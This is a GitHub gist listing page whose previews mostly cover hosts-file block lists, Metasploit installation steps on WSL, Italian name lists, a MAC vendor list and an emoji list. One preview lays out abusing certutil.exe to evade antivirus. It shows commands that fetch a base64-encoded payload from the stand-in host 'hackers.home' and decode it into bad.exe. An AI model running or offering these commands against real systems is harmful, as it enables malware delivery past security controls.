Skip to content

Instantly share code, notes, and snippets.

Avatar
🔥
Working from SapsLab

Jonny Banana JonnyBanana

🔥
Working from SapsLab
  • WebChainSolutions - SappohSamaWorkshop - Trolling Studios - ROOM#101 - H0wT0hAck
  • Bologna - Italy
View GitHub Profile
@JonnyBanana
JonnyBanana / microsoft-dns-block.txt
Created Feb 9, 2021 — forked from VirtuBox/microsoft-dns-block.txt
Blocking Microsoft DNS hosts file
View microsoft-dns-block.txt
0.0.0.0 feedback.microsoft-hohm.com
0.0.0.0 search.msn.com
0.0.0.0 a.ads1.msn.com
0.0.0.0 a.ads2.msn.com
0.0.0.0 a.rad.msn.com
0.0.0.0 ac3.msn.com
0.0.0.0 ads.msn.com
0.0.0.0 ads1.msn.com
0.0.0.0 b.ads1.msn.com
0.0.0.0 b.rad.msn.com
View image.resize.in.github.flavored.markdown.md

Image source

https://gyazo.com/eb5c5741b6a9a16c692170a41a49c858.png

Try resize it!

  • ![](https://gyazo.com/eb5c5741b6a9a16c692170a41a49c858.png | width=100)
View 3BOX.txt
This post links my 3Box profile to my Github account! Web3 social profiles by 3Box.
✅ did:3:bafyreib6e6as6gg5p6wqeulknfjaek4kobhp4z7ee4u2ox2xgjpqehr2me ✅
Create your profile today to start building social connection and trust online at https://3Box.io/
@JonnyBanana
JonnyBanana / gist:d0a6d5b39c932614d100618354ad226f
Created Nov 19, 2019 — forked from dafthack/gist:8aa4ff60cd9352448a372ce1a7b2e27e
Easy Metasploit Install on Windows Subsystem for Linux
View gist:d0a6d5b39c932614d100618354ad226f
Steps to install Metasploit on Windows 10 using the Windows Subsystem for Linux
1.) Enable Developer Mode
C:\> reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\AppModelUnlock" /t REG_DWORD /f /v "AllowDevelopmentWithoutDevLicense" /d "1"
2.) Enable Windows Subsystem for Linux
C:\> DISM /online /enable-feature /featurename:Microsoft-Windows-Subsystem-Linux
3.) Reboot
@JonnyBanana
JonnyBanana / cognomi.txt
Created Nov 18, 2019 — forked from pdesterlich/cognomi.txt
lista cognomi italiani
View cognomi.txt
-- DISCLAIMER --
il presente elenco consiste in una raccolta di cognomi presenti sul territorio italiano (non necessariamente "italiani")
viene generato prendendo processando automaticamente uno o più archivi anagrafici e non è controllato in alcun modo
è pertanto altamente possibile che ci siano errori o refusi
non è ne pretende di essere un elenco omnicomprensivo di tutti i cognomi esistenti
----------------
abbondanza
abu
accadia
View nomi_italiani.txt
-- DISCLAIMER --
il presente elenco consiste in una raccolta di nomi presenti sul territorio italiano (non necessariamente "italiani")
viene generato prendendo processando automaticamente uno o più archivi anagrafici e non è controllato in alcun modo
è pertanto altamente possibile che ci siano errori o refusi
non è nè pretende di essere un elenco omnicomprensivo di tutti i nomi esistenti
----------------
abaco
abbondanza
abbondanzia
View Python_VAR_Maker
# script by JonnyBanana
#https://github.com/JonnyBanana
# this simple script asks to assign a name to a variable
#and then asks how many variables it must print on the monitor
# the output is like:
# a1 = ''
# a2 = ''
# a3 = ''
# a4 = ''
# a5 = ''
@JonnyBanana
JonnyBanana / mac-vendor.txt
Created Nov 12, 2019 — forked from aallan/mac-vendor.txt
List of MAC addresses with vendors identities
View mac-vendor.txt
000000 Officially Xerox
000001 SuperLAN-2U
000002 BBN (was internal usage only, no longer used)
000003 XEROX CORPORATION
000004 XEROX CORPORATION
000005 XEROX CORPORATION
000006 XEROX CORPORATION
000007 XEROX CORPORATION
000008 XEROX CORPORATION
000009 powerpipes?
View CertUtil.exe Abuse to Download Malware While Bypassing AV + Regsvr32.exe Dll Injection + CSV Injection
# certutil.exe bypass av on download + base64 Decoding
#first base64 encoding the malicious file so that to an edge device it just appears as harmless text.
#Then once the text file is downloaded, the "certutil.exe -decode" command can be used to decode the base64 encoded file
#into the executable. https://www.browserling.com/tools/file-to-base64
#This is illustrated in Xavier Mertens handler diary.
# https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-download-malware-while-bypassing-av/
C:\Temp>certutil.exe -urlcache -split -f "https://hackers.home/badcontent.txt" bad.txt
C:\Temp>certutil.exe -decode bad.txt bad.exe
@JonnyBanana
JonnyBanana / gist:9a6697b08cae00320a6074c286a6e5e3
Created Jul 31, 2019 — forked from rxaviers/gist:7360908
Complete list of github markdown emoji markup
View gist:9a6697b08cae00320a6074c286a6e5e3

People

:bowtie: :bowtie: 😄 :smile: 😆 :laughing:
😊 :blush: 😃 :smiley: ☺️ :relaxed:
😏 :smirk: 😍 :heart_eyes: 😘 :kissing_heart:
😚 :kissing_closed_eyes: 😳 :flushed: 😌 :relieved:
😆 :satisfied: 😁 :grin: 😉 :wink:
😜 :stuck_out_tongue_winking_eye: 😝 :stuck_out_tongue_closed_eyes: 😀 :grinning:
😗 :kissing: 😙 :kissing_smiling_eyes: 😛 :stuck_out_tongue: